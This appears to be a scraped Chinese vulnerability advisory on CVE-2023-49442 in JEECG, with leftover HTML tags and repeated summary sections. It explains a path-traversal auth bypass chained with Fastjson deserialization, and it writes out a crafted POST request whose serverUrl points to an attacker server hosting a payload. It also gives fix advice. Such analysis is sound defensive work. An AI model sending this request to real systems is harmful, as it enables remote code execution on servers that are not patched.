JEECG代码执行漏洞分析 (CVE-2023-49442)<\/h1>

漏洞描述<\/h2>
JEECG 4.0及之前版本中存在一个严重的远程代码执行漏洞，该漏洞源于接口鉴权时未正确过滤路径遍历字符。攻击者可以构造特殊URL绕过系统鉴权机制，通过`jeecgFormDemoController.do?interfaceTest<\/code>接口实现远程代码执行。<\/p>`

影响版本<\/h2>

JEECG <= 4.0<\/li>
<\/ul>
漏洞分析<\/h2>
漏洞定位<\/h3>
漏洞位于jeecgFormDemoController.do?interfaceTest<\/code>接口处，该接口接收三个参数：<\/p>

serverUrl<\/code> - 目标服务器URL<\/li>
requestBody<\/code> - 请求体内容<\/li>
requestMethod<\/code> - 请求方法(GET\/POST)<\/li>
<\/ol>
漏洞原理<\/h3>

接口根据requestMethod<\/code>参数值调用HttpRequest.sendPost<\/code>或HttpRequest.sendGet<\/code>方法<\/li>
方法会向serverUrl<\/code>指定的地址发送HTTP请求<\/li>
获取响应结果后，使用JSONObject.parseObject(result)<\/code>进行解析<\/li>
系统使用的Fastjson版本为1.2.31（存在已知漏洞）<\/li>
当serverUrl<\/code>返回的内容包含Fastjson反序列化payload时，可触发代码执行<\/li>
<\/ol>
鉴权绕过机制<\/h3>
直接访问该路由会触发302跳转（被拦截器限制），但发现以下绕过方式：<\/p>

系统对以\/api\/<\/code>开头的接口不做限制<\/li>
alwaysUseFullPath<\/code>设置为false，在处理过程中会对URI进行标准化<\/li>
可利用\/api\/..\/<\/code>形式的路径遍历绕过鉴权<\/li>
<\/ul>
漏洞利用<\/h2>
利用步骤<\/h3>

准备远程文件（包含Fastjson代码执行payload）<\/li>
发送精心构造的HTTP请求：<\/li>
<\/ol>
POST<\/span> \/api\/..\/jeecgFormDemoController.do?interfaceTest= HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> [目标主机]<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>Content-Length:<\/span> 77<\/span>
<\/span><\/span>
<\/span><\/span>serverUrl=http:\/\/[攻击者服务器]\/jeecg.txt&requestBody=1&requestMethod=GET
<\/span><\/span><\/code><\/pre>
当服务器获取并解析恶意payload时，攻击者命令将被执行<\/li>
<\/ol>
关键参数说明<\/h3>

serverUrl<\/code>: 指向包含Fastjson payload的远程文件<\/li>
requestMethod<\/code>: 指定请求方法（GET\/POST）<\/li>
requestBody<\/code>: 随请求发送的数据<\/li>
<\/ul>
修复建议<\/h2>

升级JEECG到最新版本（4.0以上）<\/li>
若无法立即升级，可采取以下临时措施：

严格校验接口路径，防止路径遍历<\/li>
升级Fastjson到安全版本<\/li>
对jeecgFormDemoController.do?interfaceTest<\/code>接口添加严格鉴权<\/li>
限制外部URL访问能力<\/li>
<\/ul>
<\/li>
<\/ol>
参考链接<\/h2>

阿里云漏洞详情<\/a><\/li>
<\/ul>
总结<\/h2>
该漏洞结合了路径遍历鉴权绕过和Fastjson反序列化漏洞，攻击者可利用此漏洞在目标系统上执行任意代码，危害性极高。建议所有使用JEECG框架的用户立即检查版本并采取相应防护措施。<\/p>

JEECG代码执行漏洞分析 (CVE-2023-49442)<\/h1>

漏洞分析<\/h2>

漏洞利用<\/h2>

总结<\/h2> 该漏洞结合了路径遍历鉴权绕过和Fastjson反序列化漏洞，攻击者可利用此漏洞在目标系统上执行任意代码，危害性极高。建议所有使用JEECG框架的用户立即检查版本并采取相应防护措施。<\/p>

总结<\/h2>
该漏洞结合了路径遍历鉴权绕过和Fastjson反序列化漏洞，攻击者可利用此漏洞在目标系统上执行任意代码，危害性极高。建议所有使用JEECG框架的用户立即检查版本并采取相应防护措施。<\/p>